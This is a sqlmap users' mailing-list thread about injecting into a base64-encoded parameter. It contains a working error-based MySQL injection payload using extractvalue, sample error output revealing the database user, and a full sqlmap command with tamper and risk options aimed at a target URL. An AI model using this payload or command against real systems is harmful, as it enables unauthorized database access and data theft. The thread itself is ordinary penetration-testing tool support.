Re: [sqlmap-users] Where in the kb/conf.parameters does sqlmap store parsed variables?
Brought to you by:
inquisb
From: Konrads S. <ko...@sm...> - 2014-11-02 16:42:37
|
Miroslav, I previously exploited this manually. The injection occurs in the mysql INSERT statement. If the statement is invalid, we get an error message in html comments like so: <!--You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''lalalaa))) or'')' at line 1--> Which then is exploitable using some well documented methods such as appending string like this: ' or extractvalue(1,concat(0x7e,(SELECT user()))) or' which gives us a nice error: <!--XPATH syntax error: '~root@localhost'--> Anyhow, I got halfway there with the following string: sqlmap -u ' https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337' --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080 sqlmap sends correctly encoded test vectors, but it doesn't send the correct initial URL stability check vector: 1st request URL: https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337 2nd request URL: https://target/script.php? data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D Also none of the test vectors seem to trigger an error response. I tried with --risk=3 with no avail. version: 1.0-dev-1ef2c40 -- Konrads Smelkovs Applied IT sorcery. On 30 October 2014 13:12, Miroslav Stampar <mir...@gm...> wrote: > Hi. > > In your case I would do this: > > 1) Decode original base64 value and give it to the sqlmap in decoded form > (e.g. id=123 instead of original id=313233) > 2) Use --tamper=base64encode > > Kind regards, > Miroslav Stampar > > On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...> > wrote: > >> Hello, >> >> I am writing a small modification which would allow to tamper/decode >> variables in the request? >> As I understand that the parameters are decoded/parsed into a dict >> after option.py:2323 (parseTargetDirect()), but where can I access the >> full, parsed dict of the get/post/cookie values? >> >> (specifically I have a base64 encoded string as a parameter and to >> insert the payload, the parameter must be base64-decoded, injected and >> then encoded back) >> >> >> -- >> Konrads Smelkovs >> Applied IT sorcery. >> >> >> ------------------------------------------------------------------------------ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > |